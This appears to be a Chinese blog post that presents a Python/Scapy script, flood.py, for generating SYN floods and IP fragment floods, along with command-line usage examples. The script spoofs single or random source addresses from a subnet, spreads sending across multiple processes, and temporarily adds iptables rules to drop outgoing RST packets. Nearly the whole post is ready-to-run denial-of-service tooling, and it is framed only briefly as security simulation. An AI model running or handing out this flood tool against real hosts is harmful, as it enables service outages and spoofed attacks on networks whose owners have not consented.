如何使用python脚本发送sync flood
出于安全行方面考虑需要在某些情况下需模拟sync flood场景。
脚本使用方法:
Fragment Flood
python3 flood.py -dev eth2 -di 22.51.1.1 -dp 80 -si 77.12.1.1 -D 5000 -c 2000 -F
python3 flood.py -dev eth2 -di 22.51.1.1 -dp 80 -si 77.12.0.0/24 -D 5000 -c 100000 -F
Syn Flood
python3 flood.py -dev eth2 -di 22.51.1.1 -dp 80 -si 77.12.1.1 -S -c 2000
python3 flood.py -dev eth2 -di 22.51.1.1 -dp 80 -sn 77.12.0.0/24 -S -c 2000
flood.py
from concurrent.futures import ProcessPoolExecutor
import os
import random
import argparse
import traceback
from scapy.all import *
from ipaddress import ip_network
device = 'eth0'
s = None
count = 10
step = int(count / 10)
class Builder():
def __init__(self):
self.src_ip = list(ip_network(u'fd14:f60:d4db:7f9:0:66:0:0/112').hosts())
self.src_port = 0
self.data = 'X' * 5000
self.dst_ip = 'fd14:f60:d4db:7f9:0:11:0:1'
self.dst_port = 80
self.v6 = False
self.frag = False
self.ip_layer = IP
self.flags = ""
self.fragment = lambda x: x
self.get_port = lambda : self.src_port
self.get_ip = lambda : self.src_ip
def config(self, args):
if args.v6 is True:
self.ip_layer = IPv6
self.v6 = True
if args.frag is True and args.v6 is True:
self.fragment = fragment6
self.frag = True
elif args.frag is True:
self.fragment = fragment
self.frag = True
if args.syn is True:
self.flags="S"
if args.count is not None:
count=args.count
if args.src_port == 0:
self.get_port = lambda : random.randrange(1,65535)
else:
self.src_port = args.src_port
if args.src_ip is not None:
self.src_ip = args.src_ip
if args.src_network is not None:
self.src_ip = list(ip_network(unicode(args.src_network),strict=False).hosts())
self.get_ip = lambda : str(random.choice(self.src_ip))
if args.dst_ip is not None:
self.dst_ip = args.dst_ip
if args.dst_port is not None:
self.dst_port = args.dst_port
self.data = 'X' * args.payload
def build_packet(self, i):
ip=self.ip_layer(src=self.get_ip(),dst=self.dst_ip)
tcp=TCP(sport=self.get_port(), dport=self.dst_port, flags=self.flags, seq=0)
packets = [ip/tcp/self.data]
if self.frag:
if self.frag is True and self.v6 is True:
fragments = self.fragment(ip/IPv6ExtHdrFragment()/tcp/self.data, 1023)
else:
fragments = self.fragment(ip/tcp/self.data, 1023)
packets = fragments[1:]
return packets
builder = Builder()
def send(offset):
try:
packets = []
chunk = offset + step
for i in range(offset,chunk):
packets.extend(builder.build_packet(i))
if len(packets) > step:
break
for packet in packets:
s.send(packet)
return len(packets)
except Exception as e:
print(str(e))
traceback.print_exc()
def run():
with ProcessPoolExecutor(max_workers=10) as executor:
packet_counts = []
for packet_count in executor.map(send, range(1, count, step)):
packet_counts.append(packet_count)
return packet_counts
def parse():
global builder, s, device, src_ip, data, dst_ip, count, step, syn, frag
parser = argparse.ArgumentParser(description="help information here")
parser.add_argument("-v6", "--v6", default=False, action='store_true')
parser.add_argument("-dev", "--device", type=str, required=True, metavar="eth0", help="iface")
parser.add_argument("-dp", "--dst-port", type=int, required=True, metavar=1, default=80, help="start destination port")
parser.add_argument("-di", "--dst-ip", type=str, required=True, metavar="22.52.0.1", help="destination start server")
parser.add_argument("-sp", "--src-port", type=int, required=False, default = 0, metavar="3000", help="bind source port")
parser.add_argument("-si", "--src-ip", type=str, required=False, metavar="127.0.0.1", help="bind source ip")
parser.add_argument("-sn", "--src-network", type=str, required=False, metavar='fd14:f60:d4db:7f9:0:66:0:0/112', help="source network(random ip)")
parser.add_argument("-S", "--syn", default=False, action='store_true')
parser.add_argument("-F", "--frag", default=False, action='store_true')
parser.add_argument("-D", "--payload", type=int, required=False, default = 0, metavar="10", help="payload size.(filled by char 'X'")
parser.add_argument("-c", "--count", type=int, required=False, default = 10, metavar="10", help="packet count")
args = parser.parse_args()
if args.device is not None:
device = args.device
s = conf.L3socket(iface=device)
if args.count is not None:
count = args.count
step = int(count / 10)
builder.config(args)
return args
def main():
args = parse()
if args.v6:
firewall = 'ip6tables'
else:
firewall = 'iptables'
if args.src_ip is not None:
os.system('%s -A OUTPUT -p tcp -s %s --tcp-flags RST RST -j DROP' % (firewall, args.src_ip))
if args.src_network is not None:
os.system('%s -A OUTPUT -p tcp -s %s --tcp-flags RST RST -j DROP' % (firewall, args.src_network))
counts = run()
print('%d packets built. in %d chunks' % (sum(counts), len(counts)))
if args.src_ip is not None:
os.system('%s -D OUTPUT -p tcp -s %s --tcp-flags RST RST -j DROP' % (firewall, args.src_ip))
if args.src_network is not None:
os.system('%s -D OUTPUT -p tcp -s %s --tcp-flags RST RST -j DROP' % (firewall, args.src_network))
if __name__ == '__main__':
main()